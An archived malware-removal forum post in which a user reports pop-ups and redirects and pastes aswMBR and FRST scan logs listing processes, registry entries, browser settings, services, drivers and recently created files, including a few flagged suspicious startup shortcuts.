This is a read-only archive. No new posts or registrations. Privacy Page
Spyware / Malware / Virus Removal

Pop-ups, re-directs and web pages very slow to open. [Solved]

18 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

Looking for the outcome? Ask AI

Pop-ups, re-directs and web pages very slow to open.

Think I may be infected.

Please help.

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2016-09-30 12:27:06
—————————–
12:27:06.580    OS Version: Windows x64 6.1.7601 Service Pack 1
12:27:06.580    Number of processors: 2 586 0x200
12:27:06.582    ComputerName: JAMES-HP  UserName: james
12:27:10.220    Initialize success
12:27:10.377    VM: initialized successfully
12:27:10.380    VM: Amd CPU BiosDisabled
12:28:42.437    AVAST engine defs: 16093000
12:29:43.355    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\0000005e
12:29:43.355    Disk 0 Vendor: Hitachi_ JP2O Size: 476940MB BusType: 11
12:29:43.464    Disk 0 MBR read successfully
12:29:43.480    Disk 0 MBR scan
12:29:43.574    Disk 0 Windows 7 default MBR code
12:29:43.589    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
12:29:43.605    Disk 0 default boot code
12:29:43.698    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       459222 MB offset 206848
12:29:43.792    Disk 0 Partition 3 00     07    HPFS/NTFS NTFS        17616 MB offset 940693504
12:29:44.026    Disk 0 scanning C:\Windows\system32\drivers
12:30:11.529    Service scanning
12:31:13.211    Modules scanning
12:31:13.227    Disk 0 trace - called modules:
12:31:13.242    ntoskrnl.exe CLASSPNP.SYS disk.sys amd_xata.sys storport.sys hal.dll amd_sata.sys
12:31:13.258    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004c3c450]
12:31:13.274    3 CLASSPNP.SYS[fffff8800145043f] -> nt!IofCallDriver -> [0xfffffa800470c040]
12:31:13.274    5 amd_xata.sys[fffff88001148d00] -> nt!IofCallDriver -> \Device\0000005e[0xfffffa80046f9470]
12:31:14.958    AVAST engine scan C:\Windows
12:31:20.590    AVAST engine scan C:\Windows\system32
12:42:22.586    AVAST engine scan C:\Windows\system32\drivers
12:42:51.259    AVAST engine scan C:\Users\james
12:46:57.381    AVAST engine scan C:\ProgramData
12:51:17.907    Disk 0 statistics 3903221/0/0 @ 4.16 MB/s
12:51:17.923    Scan finished successfully
12:51:32.602    Disk 0 MBR has been saved successfully to "C:\Users\james\Desktop\MBR.dat"
12:51:32.711    The log file has been saved successfully to "C:\Users\james\Desktop\aswMBR.txt"

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-09-2016
Ran by [removed] (administrator) on JAMES-HP (30-09-2016 13:01:42)
Running from C:\Users\[removed]\Desktop
[removed] Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Canon Inc.) C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\CNYHKEY.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(CyberLink) C:\Program Files (x86)\Cyberlink\YouCam\YCMMirage.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7666392 2014-12-11] (Realtek Semiconductor)
HKLM\…\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1340192 2016-01-29] (Microsoft Corporation)
HKLM\…\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM-x32\…\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2012-01-27] (Advanced Micro Devices, Inc.)
HKLM-x32\…\Run: [] => [X]
HKLM-x32\…\Run: [LaunchHPOSIAPP] => C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\LaunchApp.exe [385024 2009-04-03] (Hewlett-Packard)
HKU\S-1-5-21-531013560-757715300-2485835200-1000\…\Run: [**fprfkc<*>] => "C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk [2016-09-29]
ShortcutTarget: f35faa2c.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] [removed] [removed] 192.168.1.1
Tcpip\..\Interfaces\{39A2E28A-93C1-45D4-9733-A9040D62B0E6}: [DhcpNameServer] [removed] [removed] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-531013560-757715300-2485835200-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=msnhome
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=iesearch
SearchScopes: HKLM -> {3B5C380A-502F-466A-93C1-CEB04D10D2EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag;=hp-us1-vsb-20&link;%5Fcode=qs&index;=aps&field-keywords;={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-08-16] (Microsoft Corporation)
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> c:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-29] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-08-09] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-08-16] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> c:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-08-09] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-04-19] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488
FF DefaultSearchEngine.US: Google
FF Homepage: hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-09-16] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (HP Smart Print) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2012-12-30] [not signed]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 CalendarSynchService; C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [16384 2011-08-16] (Hewlett-Packard) [File not signed]
R2 CCALib8; C:\Program Files (x86)\Canon\CAL\CALMAIN.exe [96341 2005-09-30] (Canon Inc.) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3192560 2016-07-26] (Microsoft Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2016-01-29] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [374344 2016-01-29] (Microsoft Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-08-12] (PDF Complete Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-12-11] (Realtek Semiconductor)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 CpqDfw; C:\Windows\System32\drivers\CpqDfw.sys [27456 2012-05-29] (Windows (R) Codename Longhorn DDK provider)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 EMVSCARD; C:\Windows\System32\Drivers\EMVSCARD.sys [28544 2006-12-13] (USB Smart Card Reader)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [289120 2015-11-13] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [133816 2015-11-13] (Microsoft Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 aswMBR; \??\C:\Users\james\AppData\Local\Temp\aswMBR.sys [X]
U3 aswVmm; \??\C:\Users\james\AppData\Local\Temp\aswVmm.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Three Months Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-09-30 13:01 - 2016-09-30 13:02 - 00015117 _____ C:\Users\james\Desktop\FRST.txt
2016-09-30 12:59 - 2016-09-30 13:01 - 00000000 ____D C:\FRST
2016-09-30 12:58 - 2016-09-30 12:58 - 02404352 _____ (Farbar) C:\Users\james\Desktop\FRST64.exe
2016-09-30 12:51 - 2016-09-30 12:51 - 00002187 _____ C:\Users\james\Desktop\aswMBR.txt
2016-09-30 12:51 - 2016-09-30 12:51 - 00000512 _____ C:\Users\james\Desktop\MBR.dat
2016-09-30 12:23 - 2016-09-30 12:23 - 05198336 _____ (AVAST Software) C:\Users\james\Desktop\aswMBR.exe
2016-09-29 18:51 - 2016-09-29 18:51 - 00000608 _____ C:\Users\james\Documents\cc_20160929_185119.reg
2016-09-29 16:12 - 2016-09-29 16:12 - 00001121 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-09-29 16:12 - 2016-09-29 16:12 - 00001109 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-09-29 16:12 - 2016-09-29 16:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-09-29 16:03 - 2016-09-29 16:03 - 00000484 _____ C:\Users\james\Documents\cc_20160929_160328.reg
2016-09-29 12:55 - 2016-09-29 12:55 - 00000000 ____D C:\Users\james\AppData\Roaming\c252533c
2016-09-29 12:55 - 2016-09-29 12:55 - 00000000 ____D C:\Users\james\AppData\Local\ecf2194c
2016-09-26 12:50 - 2016-09-26 12:50 - 03861056 _____ C:\Users\james\Desktop\adwcleaner_6.020.exe
2016-08-25 15:06 - 2016-08-25 15:06 - 00000000 ____D C:\Users\james\AppData\Roaming\Roxio Log Files
2016-08-17 10:26 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-08-17 10:26 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-08-10 23:26 - 2016-08-02 10:08 - 00346312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-08-10 23:26 - 2016-08-02 02:47 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-08-10 23:26 - 2016-08-02 02:31 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-08-10 23:26 - 2016-08-02 02:23 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-08-10 23:26 - 2016-08-02 02:19 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-08-10 23:26 - 2016-08-02 02:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-08-10 23:26 - 2016-08-02 02:00 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-08-10 23:26 - 2016-08-02 01:59 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-08-10 23:26 - 2016-08-02 01:54 - 20343808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-08-10 23:26 - 2016-08-02 01:51 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-08-10 23:26 - 2016-08-02 01:51 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-08-10 23:26 - 2016-08-02 01:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-08-10 23:26 - 2016-08-02 01:51 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-08-10 23:26 - 2016-08-02 01:50 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-08-10 23:26 - 2016-08-02 01:44 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-08-10 23:26 - 2016-08-02 01:38 - 00724992 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-08-10 23:26 - 2016-08-02 01:29 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-08-10 23:26 - 2016-08-02 01:28 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-08-10 23:26 - 2016-08-02 01:25 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-08-10 23:26 - 2016-08-02 01:24 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-08-10 23:26 - 2016-08-02 01:22 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-08-10 23:26 - 2016-08-02 01:15 - 00692736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-08-10 23:26 - 2016-08-02 00:53 - 01316352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-08-10 23:26 - 2016-08-02 00:51 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-08-10 23:26 - 2016-07-08 11:37 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-08-10 23:26 - 2016-07-08 11:37 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-08-10 23:26 - 2016-07-08 11:32 - 01464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-08-10 23:26 - 2016-07-08 11:32 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-08-10 23:26 - 2016-07-08 11:17 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-08-10 23:26 - 2016-07-08 11:17 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-08-10 23:26 - 2016-07-08 11:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-08-10 23:26 - 2016-07-08 11:03 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-08-10 23:26 - 2016-07-08 10:57 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-08-10 23:26 - 2016-07-08 10:56 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-08-10 23:26 - 2016-07-08 10:56 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-08-10 23:26 - 2016-07-08 10:55 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-08-10 23:26 - 2016-07-08 10:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-08-10 23:26 - 2016-07-08 10:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
